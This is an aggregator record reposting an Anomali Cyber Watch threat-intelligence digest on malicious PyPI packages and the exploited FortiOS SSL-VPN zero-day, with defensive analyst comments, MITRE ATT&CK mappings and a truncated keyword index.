One Article Review
| Source |  Anomali |
|---|---|
| Identifiant | 8302291 |
| Date de publication | 2023-01-18 16:35:00 (vue: 2023-01-18 17:06:40) |
| Titre | Anomali Cyber Watch: FortiOS Zero-Day Has Been Exploited by an APT, Two RATs Spread by Four Types of JAR Polyglot Files, Promethium APT Continued Android Targeting |
| Texte | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, DDoS, Polyglot, RATs, Russia, Skimmers, Trojanized apps, and Ukraine. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Malicious ‘Lolip0p’ PyPi Packages Install Info-Stealing Malware
(published: January 16, 2023)
On January 10, 2023, Fortinet researchers detected actor Lolip0p offering malicious packages on the Python Package Index (PyPI) repository. The packages came with detailed, convincing descriptions pretending to be legitimate HTTP clients or, in one case, a legitimate improvement for a terminal user interface. Installation of the libraries led to infostealing malware targeting browser data and authentication (Discord) tokens.
Analyst Comment: Free repositories such as PyPI become increasingly abused by threat actors. Before adding a package, software developers should review its author and reviews, and check the source code for any suspicious or malicious intent.
MITRE ATT&CK: [MITRE ATT&CK] T1204 - User Execution | [MITRE ATT&CK] T1555 - Credentials From Password Stores
Tags: actor:Lolip0p, Malicious package, malware-type:Infostealer, Discord, PyPi, Social engineering, Windows
Analysis of FG-IR-22-398 – FortiOS - Heap-Based Buffer Overflow in SSLVPNd
(published: January 11, 2023)
In December 2022, the Fortinet network security company fixed a critical, heap-based buffer overflow vulnerability (FG-IR-22-398, CVE-2022-42475) in FortiOS SSL-VPN. The vulnerability was exploited as a zero-day by an advanced persistent threat (APT) actor who was customizing a Linux implant specifically for FortiOS of relevant FortiGate hardware versions. The targeting was likely aimed at governmental or government-related targets. The attribution is not clear, but the compilation timezone UTC+8 may point to China, Russia, and some other countries.
Analyst Comment: Users of the affected products should make sure that the December 2022 FortiOS security updates are implemented. Zero-day based attacks can sometimes be detected by less conventional methods, such as behavior analysis, and heuristic and machine learning based detection systems. Network defenders are advised to monitor for suspicious traffic, such as suspicious TCP sessions with Get request for payloads.
MITRE ATT&CK: [MITRE ATT&CK] T1622 - Debugger Evasion | [MITRE ATT&CK] T1190 - Exploit Public-Facing Application | [MITRE ATT&CK] T1105 - Ingress Tool Transfer | [MITRE ATT&CK] T1090 - Proxy | [MITRE ATT&CK] T1070 - Indicator Removal On Host
Tags: FG-IR-22-398, CVE-2022-42 |
| Envoyé | Oui |
| Condensat | #905: “who 000 001 002 003 004 057 16’s 200 2022 2023 310 398 42475 500 5000 abandoned ability abuse abused access accessibility according accumulate activity actor actor:lolip0p actor:noname actor:strongpity actors actually added adding administrator administrators advanced advances advised affect affected after against aimed all allow always amount analysis analyst and/or android android/strongpity announces anomali another anti any app appear appended application applications apps apt are argument around artifacts: associated assume att&ck att&ck: attached attack attackers attacks attributed attribution audio authentication author available avast avoid aware backdoor based because become been before beginning behavior being belcloud best binary bitcoin block boot botnet breach broadcast browser brute buffer building business businesses but cab+jar call called came campaign can capability capture capture: card carding carrying case chain change channel channel: charts chat check china clear clients cloud code collective command comment: commerce communication community company compilation compromised concern configuration contact containing continued continuity conventional convincing copied core cost count countries country:lt country:lv country:pl country:ru country:tr country:ua cracking created credentials credit crime crimeware critical crypto cryptocurrency cryptography current customers customizing cve cyber cyberespionage data data: day ddos ddosia ddosia’s debugger december deep defenders defenses: denial dependencies derivation descriptions detailed detected detection detection:android/strongpity detection:bakso detection:ddosia detection:elf/bakso detection:ratty detection:strrat developers device different digital directory dirty disable disclosed discord discovery discuss discussed distribution dollars domain domains down download downloading each encrypted engineering enough entities eset espionage estimated evasion even event excessive execution execution: exfiltrate exfiltration expand expect exploit exploited exposed extended facing factor fake field figure figures file files files: fixed follow followers following force force: forcing fortigate fortinet fortios four framework free from fully function functional functioning gathering get giveaway gives glimpse gmail google government governmental group group:promethium groups guard hacktivism hacktivist had happy hardware has hashed have haven heap heavier heuristic hide hmac host hosting hosts http httrack hundred identified impair implant implement implemented important improvement incentivise including increasing increasingly index indicator indicators industry industry:e industry:government infected info information information: infostealing infrastructure ingress injection input inspired install installation instinct integrity intelligence intensity intent interface invalid involved ioc iocs iteration iterations its january jar jars java javaw judging junk just keep kernel key keylogging known large last lastpass latvia layer leads learning least led legitimate less libraries likely link linux linux/macos list lithuania location log logon logs lolip0p loss low lower lowers ltd machine machines magazine magecart main make makes malicious malware malwarebytes manager many masquerade masquerading: may measures memorized messages messenger methods misidentified mitre mixers mobile modern modified modify modular monitor more msi+jar named naming network new news nist non noname noname057 not note notifications now number numbers obfuscated obtain occurred offered offering one ones online order organizations other out over overall overflow owasp package packages padding panel partition party passed password passwords payloads payments pbkdf2 perform performance performers periods permission persistent phishing: place plan platform play point poland polyglot polyglots port:20443 port:30080 port:30081 port:30443 port:443 port:444 port:80 port:8033 port:8443 possible potential potentially power practical practices pretending previ |
| Tags | Malware Tool Vulnerability Threat Guideline |
| Stories | LastPass |
| Notes | ★★ |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.